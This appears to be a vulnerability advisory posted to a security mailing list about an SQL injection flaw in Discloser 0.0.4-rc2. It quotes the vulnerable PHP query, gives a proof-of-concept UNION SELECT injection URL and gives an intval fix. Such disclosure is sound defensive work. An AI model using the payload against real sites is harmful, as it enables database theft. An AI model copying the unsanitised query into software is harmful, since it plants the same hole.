Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[BONSAI] SQL Injection in CS-Cart

[ MDVSA-2009:192 ] phpmyadmin

[CSS09-01] SlideShowPro Director File Disclosure Vulnerability

OpenCms (7.5.0) - Vulnerability: Cross-Site Scripting, Phishing Through Frames, Application Error

From:	Salvatore "drosophila" Fresta <drosophilaxxx_(at)_gmail.com>
Date:	09.08.2009
Subject:	Discloser 0.0.4-rc2 SQL Injection Vulnerability

********   Salvatore "drosophila" Fresta   ********

[+] Application: Discloser
[+] Version: 0.0.4-rc2
[+] Website: http://discloser.sourceforge.net/

[+] Bugs: [A] SQL Injection

[+] Exploitation: Remote
[+] Date: 21 Feb 2004

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] SQL Injection

[-] Risk: medium
[-] File affected: displayposts.php

This flaw allows a guest to insert arbitrary SQL
statments in the affected query.

...

if (isset($_GET['more'])) {
                       $more = $_GET['more'];
                       $query = mysql_query("select ". $tableprefix ."posts.*, ". $tableprefix
."users.username, ". $tableprefix ."users.email from ". $tableprefix ."posts, ". $tableprefix ."users
where ". $tableprefix ."posts.poster = ". $tableprefix ."users.username and ". $tableprefix ."posts.id
= $more");

...


***************************************************

[+] Code


- [A] SQL Injection

You can retrieve information from 3,4,7,8 fields.

http://www.site.com/path/index.php?more=-1 UNION ALL SELECT 1,'long',3,4,5,6,7,8,9,10


***************************************************

[+] Fix

To fix the flaw, you must to accept numeric content
only, using, for example, intval PHP function:

$more = intval($_GET['more']);


***************************************************